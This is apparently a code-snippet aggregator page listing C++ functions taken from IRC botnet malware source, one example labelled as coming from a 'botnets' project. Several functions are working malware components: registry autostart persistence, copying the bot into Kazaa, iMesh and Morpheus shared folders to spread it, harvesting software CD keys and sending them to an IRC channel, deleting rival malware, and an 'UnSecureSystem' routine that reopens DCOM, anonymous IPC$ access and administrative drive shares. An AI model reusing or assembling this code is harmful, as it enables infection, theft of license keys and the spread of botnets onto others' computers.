예제 #1
0
char *RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,DWORD type/*=REG_SZ*/)
{	
	HKEY key=NULL;
	DWORD dwRes=65535;
	static char szRegBuffer[65535+2];
	ZeroMemory(szRegBuffer,65535);
	if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key) == ERROR_SUCCESS)
	{
		if(fRegQueryValueEx(key,name,NULL,NULL,(unsigned char *)szRegBuffer,&dwRes) == ERROR_SUCCESS)
		{
			if (type==REG_MULTI_SZ)
			{
				szRegBuffer[dwRes] = '\0';	// Ensure termination

				// Skip back through ALL the null chars first
				while (szRegBuffer[dwRes]=='\0' && dwRes != 0)
					--dwRes;

				for (unsigned int i=0; i<dwRes; ++i)
				{
					if (szRegBuffer[i]=='\0')
						szRegBuffer[i]='\n'; // Convert to \n
				}
			}
			fRegCloseKey(key);
			return szRegBuffer;
		}
		fRegCloseKey(key);
	}
	return '\0';
}
예제 #2
0
BOOL RegExists(HKEY root,LPCTSTR subkey,char *name,DWORD type)
{
	BOOL bRet=FALSE;
	HKEY key=NULL;
	if (!subkey || !name)
		return bRet;
	if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
	{
		if (type==REG_DWORD)
		{
			BOOL success=FALSE;
			DWORD dwRet=RegQuery(root,subkey,name,&success);
			if (success)
				bRet=TRUE;
			else
				bRet=FALSE;
		}
		else if (type==REG_SZ || type==REG_EXPAND_SZ || type==REG_MULTI_SZ)
		{
			char *szRet=RegQuery(root,subkey,name,REG_SZ);
			if (szRet)
				bRet=TRUE;
			else
				bRet=FALSE;
		}
		fRegCloseKey(key);
	}
	return bRet;
}
예제 #3
0
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128];

	HKEY hkey;
	LONG lRet;
	DWORD dwSize = 128;

	for (unsigned int i=0; viruses[i].subkey; i++) {
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
		if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {

				fRegDeleteValue(hkey, viruses[i].value);
				//FIXME: Replace the afw kill utils. we dont need to let that loop,
				//		 when we removed the .exe and the reg key. mayb a static call
				//		 to KillProcess(); can be inserted here. Something like:
				// KillProcess(viruses[i].file);
				GetSystemDirectory(sysdir, sizeof(sysdir));
				sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
				DeleteFile(virusexecuteble);

		}
		fRegCloseKey(hkey);
	}

	return;
}
예제 #4
0
DWORD RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,BOOL &success)
{	
	HKEY key=NULL;
	DWORD dwType=REG_DWORD,dwSize=sizeof(DWORD),dwRead=0;
	if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS)
	{
		if(fRegQueryValueEx(key,name,NULL,&dwType,(LPBYTE)&dwRead,&dwSize)==ERROR_SUCCESS)
		{
			fRegCloseKey(key);
			success=TRUE;
			return dwRead;
		}
		fRegCloseKey(key);
	}
	success=FALSE;
	return 0;
}
예제 #5
0
BOOL RegDelete(HKEY root,LPCTSTR subkey,LPCTSTR name)
{
	HKEY key=NULL;
	if (!subkey)
		return FALSE;

	if (!name)
	{
		if (fRegDeleteKey(root,subkey) == ERROR_SUCCESS) 
			return TRUE;
		
		DWORD inx = 0;
		DWORD chr = 256;
		char buf[256] = {0};
		FILETIME ftm;
		
		if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
		{
			DWORD cnt = fRegEnumKeyEx(key,inx,buf,&chr,NULL,NULL,NULL,&ftm);
			while ((cnt != ERROR_NO_MORE_ITEMS) && (cnt == ERROR_SUCCESS)) {
				RegDelete(root,subkey,buf);
				cnt = fRegEnumKeyEx(key,(inx++),buf,&chr,NULL,NULL,NULL,&ftm);
			}
			
			fRegDeleteKey(key,subkey);
		}
	}
	else
	{
		if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
		{
			if (fRegDeleteValue(key,name) == ERROR_SUCCESS)
			{
				fRegCloseKey(key);
				return TRUE;
			}
			fRegCloseKey(key);
		}
	}

	return FALSE;
}
예제 #6
0
void iMeshInit(char *botfile)
{
	char buffer[MAX_PATH];

	HKEY hkey = NULL;
	DWORD dwSize = 128;

	fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\iMesh\\Client", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "DownloadsLocation", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
예제 #7
0
void AutoStartRegs(char *nfilename)
{
	HKEY key;

	for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
		fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
		if (nfilename)
			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
		else
			fRegDeleteValue(key, valuename); 
		fRegCloseKey(key); 
	}
   
	return;
}
예제 #8
0
void KazaaInit(char *botfile)
{
	char buffer[MAX_PATH];

	HKEY hkey;
	DWORD dwSize = 128;

	fRegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\KAZAA\\LocalContent", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "Dir0", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		replacestr(buffer, "012345:", "");
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
예제 #9
0
void MorpheusInit(char *botfile)
{
	char buffer[MAX_PATH];

	HKEY hkey;
	DWORD dwSize = 128;

	fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Morpheus", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "Install_Dir", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		_snprintf(buffer, sizeof(buffer), "%s\\My Shared Folder", buffer);
		CreateDirectory(buffer, 0);
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
예제 #10
0
void getcdkeys(SOCKET sock, char *chan, BOOL notice)
{
	char sendbuf[IRCLINE], line[100], szPath[MAX_PATH];
	unsigned char szDataBuf[128];

	FILE *fp;
	HKEY hkey;
	LONG lRet;
	DWORD dwSize = 128;

	for (unsigned int i=0; regkeys[i].subkey; i++) {
		lRet = fRegOpenKeyEx(regkeys[i].hkey, regkeys[i].subkey, 0, KEY_READ, &hkey);
		if(fRegQueryValueEx(hkey, regkeys[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			if (regkeys[i].file) {
				sprintf(szPath, "%s\\%s", szDataBuf, regkeys[i].file);
				if((fp=fopen(szPath,"r"))!=NULL) {
					while(fgets(line,sizeof(line),fp)) {
						if(!strstr(line, regkeys[i].tag)) {
							if (strchr(regkeys[i].tag,'=')) {
								strtok(line,"=");
								sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,strtok(NULL, "="));
							} else
								sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,line);
							irc_privmsg(sock,chan,sendbuf,notice);
							addlog(sendbuf);
							break;
						}
					}
					fclose(fp);
				}
			} else {
				sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,szDataBuf);
				irc_privmsg(sock,chan,sendbuf,notice);
				addlog(sendbuf);
			}
		}
		fRegCloseKey(hkey);
	}

	return;
}
예제 #11
0
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128]; 
	SOCKET sock;
	HKEY hkey;
	char sendbuf[IRCLINE];
	char current[20];
	LONG lRet;
	sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	DWORD dwSize = 128;

	for (unsigned int i=0; viruses[i].subkey; i++) {
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
		if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			
				fRegDeleteValue(hkey, viruses[i].value);
				strcpy(current,viruses[i].file);
				//FIXME: Replace the afw kill utils. we dont need to let that loop,
				//		 when we removed the .exe and the reg key. mayb a static call
				//		 to KillProcess(); can be inserted here. Something like:
				if(listProcesses(sock,NULL,FALSE,current) == 1)
					sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
				else
					sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
				//KillProcess(viruses[i].file);
				GetSystemDirectory(sysdir, sizeof(sysdir));
				sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
				DeleteFile(virusexecuteble);
			
		}
		fRegCloseKey(hkey);
		
	}
	sprintf(sendbuf,"[AV]: Antivirus search complete! ");
	return;
}
예제 #12
0
char *GetFirefoxLibPath()
{
	char regSubKey[]    = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
	char path[_MAX_PATH] ="";
	char *firefoxPath = NULL;
	DWORD pathSize = _MAX_PATH;
	DWORD valueType;
	HKEY rkey;

	// Open firefox registry key
	if( fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
	{
		//DisplayMesg(TYPE_DEBUG, "\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
		return NULL;
	}

	// Read the firefox path value
	if( fRegQueryValueEx(rkey, NULL, 0,  &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS )
	{
		//DisplayMesg(TYPE_DEBUG, "\n Failed to read the firefox path value from registry ");
		fRegCloseKey(rkey);
		return NULL;
	} 
	
	if( pathSize <= 0 || path[0] == 0)
	{
		//DisplayMesg(TYPE_DEBUG, "\n Path value read from the registry is empty");
		fRegCloseKey(rkey);
		return NULL;
	}	

	fRegCloseKey(rkey);

	// This path may contain extra double quote....
	if( path[0] == '\"' )
	{
		for(unsigned int i=0; i< strlen(path)-1 ; i++)
			path[i] = path[i+1];
	}

	//DisplayMesg(TYPE_DEBUG, "\n Path value read from registry is %s", path);

	// Terminate the string at last "\\"
	for(int j=strlen(path)-1; j>0; j--)
	{
		if( path[j] == '\\' )
		{
			path[j]=0;
			break;
		}
	}

	firefoxPath = (char*) malloc( strlen(path) + 1);
	
	if( firefoxPath )
		strcpy(firefoxPath, path);

	//DisplayMesg(TYPE_DEBUG, "\n Firefox path = [%s] ", firefoxPath);
		
	return firefoxPath;

}
예제 #13
0
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	if (!noadvapi32) {
		HKEY hKey;
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="N";
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	if (!nonetapi32) {
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;

		do {
			nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
				p = pBuf;

				for(unsigned int i=1;i <= entriesread;i++) {
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
						if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success)
							_snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »»  Share '%S' deleted.",p->shi502_netname);
						else
							_snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »»  Failed to delete '%S' share.",p->shi502_netname);
						if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
						addlog(sendbuf);
					}

					p++;
				}

				fNetApiBufferFree(pBuf);
			} else {
				for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
					if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName);
					else
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				}
			}
		} while (nStatus == ERROR_MORE_DATA);
		sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
	addlog(sendbuf);

	return TRUE;
}
예제 #14
0
BOOL UnSecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	if (!noadvapi32) {
		HKEY hKey;
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="Y";
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Enable DCOM failed.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: DCOM enabled.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000000;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Failed to unrestrict access to the IPC$ Share.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: Unrestricted access to the IPC$ Share.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ restriction registry key.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	if (!nonetapi32) {
		for(int i=0;i < ((sizeof(ShareList) / sizeof (NetShares)) - 2);i++) {
			if(ShareAdd(NULL,ShareList[i].ShareName,ShareList[i].SharePath) == NERR_Success)
				_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",ShareList[i].ShareName);
			else
				_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",ShareList[i].ShareName);
			if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
			addlog(sendbuf);
		}

		char sharename[10], sharepath[10];
		DWORD dwDrives = GetLogicalDrives();
		for(char cDrive='A'; dwDrives!=0; cDrive++, dwDrives=(dwDrives>>1)) {
			if((dwDrives & 1)==1 && cDrive != 'A') {
				_snprintf(sharename,sizeof(sharename),"%c$",cDrive);
				_snprintf(sharepath,sizeof(sharepath),"%c:\\",cDrive);

				if (fGetDriveType(sharepath) == DRIVE_FIXED) {
					if(ShareAdd(NULL,sharename,sharepath) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",sharename);
					else
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",sharename);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				}
			}
		}

		sprintf(sendbuf,"4<<12[SECURE]: Network shares added.4>>");
	} else
예제 #15
0
파일: secure.cpp 프로젝트: hazcod/botnets
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	if (!noadvapi32) {
		HKEY hKey; 
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="N"; 
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Disable DCOM failed.");
			else
				sprintf(sendbuf,"[SECURE]: DCOM disabled.");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share.");
			else
				sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share.");			
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.");
			else
				sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts.");			
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		#ifndef NO_LSARESTRICT
		DWORD dwRet;
		if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0)
			sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet);
		else
			sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy.");
		#endif
	} else
		sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded.");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	#ifndef NO_NET
	if (!nonetapi32) {
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;
 
		do {
			nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
				p = pBuf;
 
				for(unsigned int i=1;i <= entriesread;i++) {
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {	
						char* szShareName = new char[wcslen(p->shi502_netname)+1];
						WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL);

						if(ShareDel(NULL,szShareName) == NERR_Success)
							_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname);
						else 
							_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname);
						if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
						addlog(sendbuf);

						delete szShareName;
					}

					p++;
				}

				fNetApiBufferFree(pBuf);
			} else {
				for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) { 
					if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName);
					else 
						_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				} 
			}
		} while (nStatus == ERROR_MORE_DATA);	
		sprintf(sendbuf,"[SECURE]: Network shares deleted.");
	} else
		sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded.");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
	addlog(sendbuf);
	#endif

	return TRUE;
}
예제 #16
0
BOOL RegWrite(HKEY hKey,LPCTSTR SubKey,LPCTSTR KeyName,DWORD Type,RQUERY Data)
{
	HKEY	hRegKey;
	DWORD	dwBuf;
	char	szRegBuffer[65535+2]; // Only allow writing of 64Kb to a key, include space for double null
	int		i, nLen;

	// Open the registry key
	if (fRegCreateKeyEx(hKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_WRITE,NULL,&hRegKey,NULL) != ERROR_SUCCESS)
	{
		return FALSE;
	}

	// If no keyname then we are finished
	if (KeyName == 0)
	{
		fRegCloseKey(hRegKey);
		return TRUE;
	}

	// Write the registry differently depending on type of variable we are writing
	switch (Type)
	{

	case REG_EXPAND_SZ:
		nLen=(int)strlen(Data.szQuery);
		strcpy(szRegBuffer,Data.szQuery);
		if (fRegSetValueEx(hRegKey,KeyName,0,REG_EXPAND_SZ,(CONST BYTE *)szRegBuffer,(DWORD)nLen+1) != ERROR_SUCCESS)
		{
			fRegCloseKey(hRegKey);
			return FALSE;
		}

		break;

	case REG_SZ:
		nLen=(int)strlen(Data.szQuery);
		strcpy(szRegBuffer,Data.szQuery);
		if (fRegSetValueEx(hRegKey,KeyName,0,REG_SZ,(CONST BYTE *)szRegBuffer,(DWORD)nLen+1) != ERROR_SUCCESS)
		{
			fRegCloseKey(hRegKey);
			return FALSE;
		}

		break;

	case REG_DWORD:
		dwBuf=Data.dwQuery;
		if (fRegSetValueEx(hRegKey,KeyName,0,REG_DWORD,(CONST BYTE *)&dwBuf,sizeof(dwBuf)) != ERROR_SUCCESS)
		{
			fRegCloseKey(hRegKey);
			return FALSE;
		}

		break;

	case REG_MULTI_SZ:
		nLen=(int)strlen(Data.szQuery);	
		strcpy(szRegBuffer,Data.szQuery);

		// Change all \n to \0 then double null terminate
		szRegBuffer[nLen]='\0';				// Double null
		szRegBuffer[nLen+1]='\0';

		for (i=0;i<nLen;++i)
			if (szRegBuffer[i]=='\n')
				szRegBuffer[i]='\0';

		// If blank then must use nLen = 0, ignoring \0\0 (blank values not allowed)
		// Otherwise take our stringlen + 2 (double null) as the size
		if (nLen != 0)
			nLen = nLen + 2;

		if (fRegSetValueEx(hRegKey,KeyName,0,REG_MULTI_SZ,(CONST BYTE *)szRegBuffer,(DWORD)nLen) != ERROR_SUCCESS)
		{
			fRegCloseKey(hRegKey);
			return FALSE;
		}
		break;

	default:
		fRegCloseKey(hRegKey);
		return FALSE;
		break;

	}

	fRegCloseKey(hRegKey);
	return TRUE;

}
예제 #17
0
BOOL RegQuery(HKEY root,LPCTSTR subkey,char *target,void *conn)
{
	IRC* irc=(IRC*)conn;
	HKEY key=NULL;
	DWORD dwRet; 
	DWORD cSubKeys=0;// number of subkeys 
	DWORD cValues;// number of values for key 
	DWORD dwMaxSubKey;// longest subkey size 
	DWORD dwMaxClass;// longest class string 
	DWORD dwMaxValue;// longest value name 
	DWORD dwMaxValueData;// longest value data 
	DWORD dwsd;// size of security descriptor 
	
	char szKeyName[MAX_KEY_LENGTH];
	DWORD dwKeySize=MAX_KEY_LENGTH;
	TCHAR  szValueName[MAX_VALUE_NAME];
	DWORD dwValueSize=MAX_VALUE_NAME;
	DWORD dwValueType;

	char szKeyClass[128];
	DWORD dwClassSize=sizeof(szKeyClass);
	
	FILETIME lpft;
	int i;
	int isent=0;
	//static char szRegBuffer[65535+2];
	//ZeroMemory(szRegBuffer,65535);
    
	if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key) == ERROR_SUCCESS)
	{
		// Get the class name and the value count. 
		dwRet=fRegQueryInfoKey(key,szKeyClass,&dwClassSize,NULL,&cSubKeys,&dwMaxSubKey,
			&dwMaxClass,&cValues,&dwMaxValue,&dwMaxValueData,&dwsd,&lpft);
		
		int t=0;
		// Enumerate the subkeys
		if (cSubKeys)
		{
			//irc->privmsg(target,"%s Number of subkeys: %d",reg_title,cSubKeys);
			for (i=0; i<cSubKeys; i++,t++) 
			{ 
				dwKeySize=MAX_KEY_LENGTH;
				dwRet=fRegEnumKeyEx(key,i,szKeyName,&dwKeySize,NULL,NULL,NULL,&lpft); 
				if (dwRet == ERROR_SUCCESS) 
				{
					irc->privmsg(target,"(%.2d) %s\\%s",t+1,subkey,szKeyName);
					isent++;
				}
			}
		} 

		
		// Enumerate the key values. 
		if (cValues) 
		{
			//irc->privmsg(target,"Number of values: %d",cValues);
			for (i=0, dwRet=ERROR_SUCCESS; i<cValues; i++,t++) 
			{
				dwValueSize=MAX_KEY_LENGTH;
				szValueName[0] = '\0'; 
				dwRet=fRegEnumValue(key,i,szValueName,&dwValueSize,NULL,&dwValueType,NULL,NULL);
				if (dwRet == ERROR_SUCCESS) 
				{
					if (!strcmp(szValueName,"") && dwValueType==REG_SZ)
						sprintf(szValueName,"(Default)");
					irc->privmsg(target,"(%.2d) %s\\%s (%s)",t+1,subkey,szValueName,GetType(dwValueType));
					isent++;
				}
			}
		}

		fRegCloseKey(key);
	}
	else
		return FALSE;
	if (isent>0)
		return TRUE;
	return FALSE;
}